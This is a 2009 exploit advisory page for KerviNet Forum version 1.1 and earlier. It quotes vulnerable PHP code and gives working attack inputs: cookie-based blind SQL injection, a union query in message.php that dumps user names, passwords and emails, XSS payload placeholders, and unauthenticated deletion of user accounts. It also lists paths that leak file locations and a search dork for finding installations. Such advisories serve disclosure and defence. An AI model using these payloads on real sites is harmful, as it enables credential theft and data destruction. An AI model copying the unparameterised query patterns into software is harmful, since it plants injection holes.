KerviNet Forum <= 1.1 Multiple Remote Vulnerabilities

2009.07.08
Credit: eLwaux
Risk: High
Local: No
Remote: Yes
CVE: CVE-2009-2326 | CVE-2009-2327 | CVE-2009-2328 | CVE-2009-2329
CWE: CWE-89

dork: "Copyright KerviNet" eLwaux(c) 20.06.2009 ## ## ## ## Blind SQLinj /index.php ------------------------------------------------------------------------------------------------- if($_COOKIE['user_enter']=="auto") { $enter_login=$_COOKIE['enter_login']; $enter_parol=$_COOKIE['enter_parol']; $mysql->query("SELECT name, pass, status FROM users WHERE name = '".$enter_login."' AND pass = '".$enter_parol."'"); ------------------------------------------------------------------------------------------------- exploit: COOKIE: user_enter=auto COOKIE: enter_login = abc COOKIE: enter_parol = ' or name = (select name from users where id_user=1) and '1'='1'; sqlQuery: SELECT name, pass, status FROM users WHERE name = 'abc' AND pass = '' or name = (select name from users where id_user<10 limit ## ## ## ## SQLinj /message.php ------------------------------------------------------------------------------------------------- 9: $topic=$_GET['topic']; 18: if($topic) { 69: $mysql->query("SELECT name, viewing, voting, status, top_status, id_forum FROM topics WHERE id_topic = ".$topic); exploit:/message.php?topic=-1+union+select+1,concat_ws(0x3a,id_user,name,pass,email),3,4,5,6+from+users ------------------------------------------------------------------------------------------------- ## ## ## ## SiXSS /message.php exploit:/message.php?topic=-1+union+select+1,'{XSS}',3,4,5,6+from+users ## ## ## ## aXSS /add_voting.php ------------------------------------------------------------------------------------------------- 22: $topic=$_GET['topic']; 61: if($topic) { 66: $forum_edit->add_voting($time, $topic, $v_vopros, $variants); 74: } function add_voting($time, $topic, $v_vopros, $variants) { global $user; global $user_ip; if($user) { global $mysql; $mysql->query("UPDATE topics SET voting = 1 WHERE id_topic = ".$topic); $mysql->query("INSERT INTO v_name VALUES (0, '".$v_vopros."', ".$topic.")"); $id_vname=mysql_insert_id(); for($i=0; $i<count($variants); $i+=1) { $vr_nom=$i+1; $mysql->query("INSERT INTO v_variants VALUES (".$vr_nom.", '".$variants[$i]."', ".$id_vname.")"); } } return $id_vname; } ------------------------------------------------------------------------------------------------- exploit:/add_voting.php?topic=1 POST: add_voting = ok_add POST: v_vopros = v POST: v_variant1 = {XSS} POST: v_variant2 = v2 ## ## ## ## users deleating /admin/edit_user.php ------------------------------------------------------------------------------------------------- $del_user_id=$_POST['del_user_id']; $mysql->query("DELETE FROM users WHERE id_user = ".$del_user_id); ------------------------------------------------------------------------------------------------- exploit: POST: del_user_id=(select user_id from users limit 1) ## ## ## ## Path Disclosure ------------------------------------------------------------------------------------------------- /include_files/voting_diagram.php /include_files/voting.php /include_files/topics_search.php /include_files/topics_list.php /include_files/top_part.php /include_files/quick_search.php /include_files/quick_reply.php /include_files/moder_menu.php /include_files/messages_list.php /include_files/menu.php /include_files/head.php /include_files/forums_list.php /include_files/forum_statistics.php /include_files/forum_info.php /include_files/birthday.php /admin/head.php -------------------------------------------------------------------------------------------------

References:

http://www.milw0rm.com/exploits/9068


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top